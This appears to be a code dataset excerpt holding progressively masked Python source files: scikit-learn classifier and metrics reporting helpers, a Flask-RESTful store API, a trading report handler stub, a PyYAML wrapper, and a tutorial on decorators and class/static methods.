metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,881 | 65277d8af212eb3b156a00ebb9f5a9c5c11df41c | from flask_restful import Resource, reqparse
from models.store import StoreModel
class Store(Resource):
def get(self, name):
store = StoreModel.find_store_by_name(name)
if store:
return store.json(), 200
return {"messgae": f"{name}store not found"}, 404
def post(self, name):
store = StoreModel.find_store_by_name(name)
if store:
return {"message": f"{name} already exists"}, 400
store = StoreModel(name)
try:
store.save_to_db()
return {"message": "store is created"}, 201
except:
return {"messgae": "an error has occured while saving to db"}, 500
def delete(self, name):
store = StoreModel.find_store_by_name(name)
if store:
try:
store.delete_store()
return {"message": "Store been deleted "}, 200
except:
return {"message": "An error occured while deleting the store"}, 500
return {"message": f"Unable to locate {name}"}, 404
class StoreList(Resource):
def get(self):
return {"stores": list(map(lambda store: store.json(), StoreModel.query.all()))}
| [
"from flask_restful import Resource, reqparse\nfrom models.store import StoreModel\n\n\nclass Store(Resource):\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {\"messgae\": f\"{name}store not found\"}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {\"message\": f\"{name} already exists\"}, 400\n\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {\"message\": \"store is created\"}, 201\n except:\n return {\"messgae\": \"an error has occured while saving to db\"}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {\"message\": \"Store been deleted \"}, 200\n except:\n return {\"message\": \"An error occured while deleting the store\"}, 500\n return {\"message\": f\"Unable to locate {name}\"}, 404\n\n\nclass StoreList(Resource):\n def get(self):\n return {\"stores\": list(map(lambda store: store.json(), StoreModel.query.all()))}\n",
"from flask_restful import Resource, reqparse\nfrom models.store import StoreModel\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {'message': f'{name} already exists'}, 400\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {'message': 'store is created'}, 201\n except:\n return {'messgae': 'an error has occured while saving to db'}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n\n def post(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return {'message': f'{name} already exists'}, 400\n store = StoreModel(name)\n try:\n store.save_to_db()\n return {'message': 'store is created'}, 201\n except:\n return {'messgae': 'an error has occured while saving to db'}, 500\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n <function token>\n\n def delete(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n try:\n store.delete_store()\n return {'message': 'Store been deleted '}, 200\n except:\n return {'message': 'An error occured while deleting the store'\n }, 500\n return {'message': f'Unable to locate {name}'}, 404\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n\n def get(self, name):\n store = StoreModel.find_store_by_name(name)\n if store:\n return store.json(), 200\n return {'messgae': f'{name}store not found'}, 404\n <function token>\n <function token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n\n\nclass Store(Resource):\n <function token>\n <function token>\n <function token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n<class token>\n\n\nclass StoreList(Resource):\n\n def get(self):\n return {'stores': list(map(lambda store: store.json(), StoreModel.\n query.all()))}\n",
"<import token>\n<class token>\n\n\nclass StoreList(Resource):\n <function token>\n",
"<import token>\n<class token>\n<class token>\n"
] | false |
99,882 | 308e740c415225b738d1ed4978391e37c1a2d9b8 | import pandas as pd
from trading_system.portfolio import Portfolio
from .performance import create_drawdowns, create_sharpe_returns
from .report import Report
class ReportHandler:
"""
The ReportHandler class generates reports based on the holdings
data in the Portfolio structure.
"""
def __init__(self, portfolio: Portfolio):
self.portfolio = portfolio
def generate_report(self) -> Report:
"""
Generate a new report from the current portfolio data.
"""
# equity_curve = self._generate_equity_curve()
# summary_stats = self._generate_summary_stats(equity_curve)
# return Report(equity_curve, summary_stats)
pass
#
# def _generate_equity_curve(self):
# """
# Creates a pandas DataFrame from the all_holdings list of dictionaries.
# """
# curve = pd.DataFrame(self.portfolio.all_holdings)
# curve.set_index('datetime', inplace=True)
# curve['returns'] = curve['total'].pct_change()
# curve['equity'] = (1.0+curve['returns']).cumprod()
# return curve
#
# @staticmethod
# def _generate_summary_stats(equity_curve):
# """
# Creates a list of summary statistics for the portfolio such as
# Sharpe Ratio and drawdown information.
# """
# total_return = equity_curve['equity'][-1]
# returns = equity_curve['returns']
# pnl = equity_curve['equity']
#
# sharpe_ratio = create_sharpe_returns(returns)
# max_drawdown, drawdown_duration = create_drawdowns(pnl)
#
# return {'total_return': total_return,
# 'sharpe_ratio': sharpe_ratio,
# 'max_drawdown': max_drawdown,
# 'drawdown_duration': drawdown_duration}
| [
"import pandas as pd\n\nfrom trading_system.portfolio import Portfolio\nfrom .performance import create_drawdowns, create_sharpe_returns\nfrom .report import Report\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) -> Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n # equity_curve = self._generate_equity_curve()\n # summary_stats = self._generate_summary_stats(equity_curve)\n # return Report(equity_curve, summary_stats)\n pass\n #\n # def _generate_equity_curve(self):\n # \"\"\"\n # Creates a pandas DataFrame from the all_holdings list of dictionaries.\n # \"\"\"\n # curve = pd.DataFrame(self.portfolio.all_holdings)\n # curve.set_index('datetime', inplace=True)\n # curve['returns'] = curve['total'].pct_change()\n # curve['equity'] = (1.0+curve['returns']).cumprod()\n # return curve\n #\n # @staticmethod\n # def _generate_summary_stats(equity_curve):\n # \"\"\"\n # Creates a list of summary statistics for the portfolio such as\n # Sharpe Ratio and drawdown information.\n # \"\"\"\n # total_return = equity_curve['equity'][-1]\n # returns = equity_curve['returns']\n # pnl = equity_curve['equity']\n #\n # sharpe_ratio = create_sharpe_returns(returns)\n # max_drawdown, drawdown_duration = create_drawdowns(pnl)\n #\n # return {'total_return': total_return,\n # 'sharpe_ratio': sharpe_ratio,\n # 'max_drawdown': max_drawdown,\n # 'drawdown_duration': drawdown_duration}\n",
"import pandas as pd\nfrom trading_system.portfolio import Portfolio\nfrom .performance import create_drawdowns, create_sharpe_returns\nfrom .report import Report\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n \"\"\"\n The ReportHandler class generates reports based on the holdings\n data in the Portfolio structure.\n \"\"\"\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n\n def generate_report(self) ->Report:\n \"\"\"\n Generate a new report from the current portfolio data.\n \"\"\"\n pass\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n\n def __init__(self, portfolio: Portfolio):\n self.portfolio = portfolio\n <function token>\n",
"<import token>\n\n\nclass ReportHandler:\n <docstring token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,883 | 4ae6a43b116167a8590a7a43ea96f6692fce2fa2 | """ helper functions for yaml usage """
class myyaml():
""" myyaml """
_yaml = None
parser = None
def __init__(self):
""" __init__ """
pass
def available(self):
""" available() """
if not myyaml._yaml:
try:
import yaml
myyaml._yaml = yaml
myyaml.parser = yaml.parser
except ImportError:
return False
return True
def safe_load(self,value_string):
""" safe_load() """
return myyaml._yaml.safe_load(value_string)
def safe_dump(self, results):
""" safe_dump() """
return myyaml._yaml.safe_dump(results)
| [
"\"\"\" helper functions for yaml usage \"\"\"\n\nclass myyaml():\n \"\"\" myyaml \"\"\"\n\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self,value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n \"\"\" myyaml \"\"\"\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n _yaml = None\n parser = None\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n\n def __init__(self):\n \"\"\" __init__ \"\"\"\n pass\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n\n def safe_dump(self, results):\n \"\"\" safe_dump() \"\"\"\n return myyaml._yaml.safe_dump(results)\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n\n def safe_load(self, value_string):\n \"\"\" safe_load() \"\"\"\n return myyaml._yaml.safe_load(value_string)\n <function token>\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n\n def available(self):\n \"\"\" available() \"\"\"\n if not myyaml._yaml:\n try:\n import yaml\n myyaml._yaml = yaml\n myyaml.parser = yaml.parser\n except ImportError:\n return False\n return True\n <function token>\n <function token>\n",
"<docstring token>\n\n\nclass myyaml:\n <docstring token>\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<docstring token>\n<class token>\n"
] | false |
99,884 | 8e0c4ae950ec81a9b9570293a5704c3e712d20a6 | # Decorator
"""
Given spam a fn. and eggs a deco
spam = eggs(spam)
def eggs(function):
return function
@eggs
def spam():
pass
"""
"""
Sample Decorator
"""
import functools
# Decorator Function
def print_all_input(function):
@functools.wraps(function)
def aeggs(*args, **kwargs):
print ("args are ", args)
print ('$' * 10)
print ("kwargs are ", kwargs)
print ("NAME OF Function is", function.__name__)
return function(*args, **kwargs)
return aeggs
# Normal func
@print_all_input
def spam(a, b, c):
return a + b + c
print (spam(1, 2, 3))
"""
How decorators used in debug
import somemodule
debug_this_function=debug(somemodule.somefunc)
get debugoutput
debug_this_function()
also
somemodule.somefunc= debug_this_function
Now when u call somemodule.somefunc u will get decorated out
"""
def plus_one(function):
@functools.wraps(function)
def _plus_one(self, n):
return function(self, n + 1)
return _plus_one
class Spam(object):
def __init__(self):
pass
@plus_one
def somefunc(self, n):
print (n)
Spam().somefunc(1)
"""
class method and staticmethod
classmethod passes object and static method skips both instance and object
"""
print ("$" * 10)
class Spam(object):
def __init__(self):
pass
def some_instance(self, *args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
print ('self ', self)
@classmethod
def some_cls_method(cls, *args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
print ('cls ', cls)
@staticmethod
def some_gen_method(*args, **kwargs):
print ('args ', args)
print ('kwargs ', kwargs)
spam = Spam()
spam.some_instance(1, 2, a=5, b=6)
# Spam.some_instance() will through an error
print (spam.some_cls_method(1, 2, a=2, b=3))
Spam.some_cls_method()
"""
args ()
kwargs {}
cls <class '__main__.Spam'>
"""
"""
Extra Arguments in decorator
"""
print ('$' * 10)
def add(extra_n=5):
def _add(function):
@functools.wraps(function)
def __add(n):
print ("hey ", extra_n, n)
return function(n + extra_n)
return __add
return _add
@add(7)
@add(2)
def spam(n):
return n
print (spam(5))
| [
